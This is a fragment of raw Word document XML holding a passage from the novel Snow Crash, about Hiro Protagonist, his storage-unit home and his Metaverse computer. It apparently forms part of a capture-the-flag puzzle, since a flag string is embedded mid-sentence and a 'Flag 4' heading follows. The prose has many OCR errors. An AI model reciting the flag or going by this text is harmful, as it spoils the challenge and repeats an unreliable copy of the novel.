              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">on, and children are looking down at him through their bedroom windows, all warm and fuzzy in their </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Li'l</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Crips and Ninja Raft Warrior pajamas, which can either be flameproof or noncarcinogenic but not both at the same time. Dad is emerging from the back door, pulling on a jacket. It is a nice family, a safe family in a house full of light, like the family he was a part of until thirty seconds ago.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E2F793" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F408B9B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A38A4E8" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A1B2BD3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F6D2BCB" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Hiro Protagonist and Vitaly Chernobyl, roommates, are chilling out in their home, a spacious 20-by-30 in a U-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Stor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-It in Inglewood, California. The room has a concrete slab floor, corrugated steel walls separating it from the neighboring units, and-this is a mark of distinction and luxury-a roll-up steel door that faces northwest, giving them a few red rays at times like this, when the sun is setting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>overLAX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. From time to time, a 777 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ora</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Sukhoi/Kawasaki Hypersonic Transport will taxi in front of the sun and block the sunset with its rudder, or just mangle the red light with its jet exhaust, braiding the parallel rays into a dappled pattern on the wall.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A360B8D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>But there are worse places to live. There are much worse places right here in this U-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Stor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-It. Only the big units like this one have their own doors. Most of them are accessed via a communal loading dock that leads to a maze of wide corrugated-steel hallways and freight elevators. These are slum housing, 5-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>by.lOs</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and 10-by-lOs where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Yanoama</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> tribespersons cook beans and parboil </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>flstfuls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of coca leaves over heaps of burning lottery tickets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2665DCFE" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">It is whispered that in the old days, when the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>U-Stor~It</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was actually used for its intended purpose (namely, providing cheap extra storage space to Californians with too many material goods), certain entrepreneurs came to the front office, rented out 1O.by-lOs using fake IDs, filled them up with steel drums full of toxic chemical waste, and then abandoned them, leaving the problem for the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>U~Stor-It</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Corporation to handle. According to these rumors, U-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Stor.It</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> just padlocked those units and wrote them off. Now, the immigrants claim, certain units remain haunted by this chemical specter. It is a story they tell their children, to keep them from trying to break into padlocked units.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDBBBAA" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BB35DD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">No one has ever tried to break into Hiro and Vitaly's unit because there's nothing in there to steal, and at this point in their lives, neither one of them is important enough to kill, kidnap, or interrogate. Hiro owns a couple of nice Nipponese swords, but he always wears them, and the whole idea of stealing fantastically dangerous weapons presents the would-be perp with inherent dangers and contradictions: When you are wrestling for possession of a sword, the man with the handle always wins. Hiro also has a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pretty nice</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> computer that he usually takes with him when he goes anywhere. Vitaly owns half a carton of Lucky Strikes, an electric guitar, and a hangover.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D0E0F3E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>At the moment</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, Vitaly Chernobyl is stretched out on a futon, quiescent, and Hiro Protagonist is sitting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crosslegged</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> at a low table, Nipponese style, consisting of a cargo pallet set on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmderbiocks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6B7A97" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>As the sun sets, its red light is supplanted by the light of many neon logos emanating from the franchise ghetto that constitutes this U-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Stor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-It's natural habitat. This light, known as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loglo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fills in</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the shadowy corners of the unit with seedy, oversaturated colors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="194ACE1F" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Him</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has cappuccino skin and spiky, truncated dreadlocks. His hair does not cover as much of his head as it used to, but he is a young man, by no means bald or balding, and the slight retreat of his hairline only makes more of his high cheekbones. He is wearing shiny goggles that wrap halfway around his head</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve"> the</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bows of the goggles have little earphones that are plugged into his outer ears.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D237E0" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The earphones have some built-in noise cancellation features. This sort of thing works best on steady noise. When jumbo jets make their takeoff runs on the runway across the street, the sound is reduced to a low doodling hum. But when Vitaly Chernobyl thrashes out an experimental guitar solo, it still hurts Hiro's ears.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB68A8E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The goggles throw a light, smoky haze across his eyes and reflect a distorted wide-angle view of a flag3{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brilliantly_lit_boulevard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>} that stretches off into an infinite blackness. This boulevard does not really exist, it is a computer-rendered view of an imaginary place.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EE3EEF" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Beneath this image, it is possible to see Hiro's eyes, which look Asian. They are from his mother, who is Korean by way of Nippon. The rest of him looks more like his father, who was </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>African</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7BF10607" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68812504" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">by way of Texas by way of the Army-back in the days before it got split up into </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a number of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> competing organizations such as General Jim's Defense System and Admiral Bob's National Security.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D75E8A3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Four things are on the cargo pallet: a bottle of expensive beer from the Puget Sound area, which Hiro cannot really afford; a long sword known in Nippon as a katana and a short sword known as a wakizashi-Hiro's father looted these from Japan after World War II went atomic-and a computer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6A9B6A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The computer is a featureless black wedge. It does not have a power cord, but there is a narrow translucent plastic tube </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>emerg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from a hatch on the rear, spiraling across the cargo pallet and the floor, and plugged into a crudely installed fiber-optics socket above the head of the sleeping Vitaly Chernobyl. In the center of the plastic tube is a hair-thin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fiber.optic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> cable. The cable is carrying a lot of information back and forth between Hiro's computer and the rest of the world. In order to transmit the same amount of information on paper, they would have to arrange for a 747 cargo freighter packed with telephone books and encyclopedias to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>power.dive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> into their unit every couple of minutes, forever.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D9286B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hiro can't really afford the computer either, but he </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>has to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> have one. It is a tool of his trade. In the worldwide community of hackers, Hiro is a talented drifter. This is the kind of lifestyle that sounded romantic to him as recently as five years ago. But in the bleak light of full adulthood, which is to one's early twenties as Sunday morning is to Saturday night, he can clearly see what it really amounts to: He's broke and unemployed. And a few short weeks ago, his tenure as a pizza deliverer-the only pointless dead-end job he really enjoys-came to an end. Since then, he's been putting a lot more emphasis on his auxiliary emergency backup job: freelance stringer for the CIC, the Central Intelligence Corporation of Langley, Virginia.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F074E7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>The business is a simple one. Hiro gets information. It may be gossip, videotape, audiotape, a fragment of a computer disk, a xerox of a document. It can even be a joke based on the latest highly publicized disaster.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C18833" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6292F4E7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He uploads it to the CIC database-the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Library</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, formerly the Library of Congress, but no one calls it that anymore. Most </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>peopie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> are not entirely clear on what the word "congress" means.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACA1CCE" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76BFF156" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">And even the word "library" is getting hazy. It used to be a place full of books, mostly old ones. Then they began to include videotapes, records, and magazines. Then </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>all of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the information got converted into machine-readable form, which is to say, ones and zeroes. And as the number of media grew, the material became more up to date, and the methods for searching the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Library</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> became more and more sophisticated, it approached the point where there was no substantive difference between the Library of Congress and the Central Intelligence Agency. Fortuitously, this happened just as the government was falling apart anyway. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> they merged and kicked out a big fat stock offering.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9A5CAA" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Millions of other CIC stringers are uploading </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mfflions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of other fragments at the same time. CIC's clients, mostly large corporations and Sovereigns, rifle through the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Library</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> looking for useful information, and if they find a use for something that Him put into it, Hiro gets paid.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E1B94E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A year ago, he uploaded an entire first-draft film script that he stole from an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>igent's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> wastebasket in Burbank. Half a dozen studios wanted to see it. He ate and vacationed </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>off of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> that one for six months.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568EAD1E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Since then, times have been leaner. He has been learning the hard way that 99 percent of the information in the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Library</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> never gets used at all.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A943230" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Case in point: After a certain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> tipped him off to the existence of Vitaly Chernobyl, he put a few intensive weeks into researching a new musical phenomenon-the rise of Ukrainian nuclear fuzz-grunge collectives in L.A. He has planted exhaustive notes on this trend iii the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Library</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, including video and audio. Not one single record label, agent, or rock critic has bothered to access it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6256308E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The top surface of the computer is smooth except for a fisheye lens, a polished glass dome with a purplish optical coating. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wheneve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">- Hiro is using the machine, this lens emerges and clicks into place, its base flush with the surface of the computer. The neighborhood </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loglo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is curved and foreshortened on its surface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F919E9D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307EBD82" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">East, encased in many protective layers, so that when he took them out to show Him, it was like watching an exquisite striptease as they emerged from all that black leather and nylon, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>zippers</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and straps. And once the lens was finally exposed, pure geometric equation made real, so powerful and vulnerable at once, Hiro could only think it was like nuzzling through skirts and lingerie and outer labia and inner labia</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>. . . .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> It made him feel naked and weak and brave.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09390137" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The lens can see half of the universe-the half that is above the computer, which includes most of Hiro. In this way, it can generally keep track of where Hiro is and what direction he's looking in.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AF05E6A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Down inside the computer are three lasers-a red one, a green one, and a blue one. They are powerful enough to make a bright light but not powerful enough to burn through the back of your eyeball and broil your brain, fry your frontals, lase your lobes. As everyone learned in elementary school, these three colors of light can be combined, with different intensities, to produce any color that Hiro's eye </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>is capable of seeing</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2262F4A2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">In this way, a narrow beam of any color can be shot out of the innards of the computer, up through that fisheye lens, in any direction. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Through the use of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> electronic mirrors inside the computer, this beam is made to sweep back and forth across the lenses of Hiro's goggles, in much the same way as the electron beam in a television paints the inner surface of the eponymous Tube. The resulting image hangs in space in front of Hiro's view of Reality.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494FA286" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>By drawing a slightly different image in front of each eye, the image can be made three-dimensional. By changing the image seventy-two times a second, it can be made to move. By drawing the moving three-dimensional image at a resolution of 2K pixels on a side, it can be as sharp as the eye can perceive, and by pumping stereo digital sound through the little earphones, the moving 3-D pictures can have a perfectly realistic soundtrack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E17205" w14:textId="0F1AC6F3" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Hiro's not actually here at all. He's in a computer-generated universe </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>that</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> his computer is drawing onto his goggles and pumping into his earphones. In the lingo, this imaginary place is known as the Metaverse. Hiro spends a lot of time in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metavase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. It beats </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>the !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ out of the U-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Stor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-It.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D49D08C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00250115"/>
    <w:p w14:paraId="5D0EB8E3" w14:textId="707BAD63" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
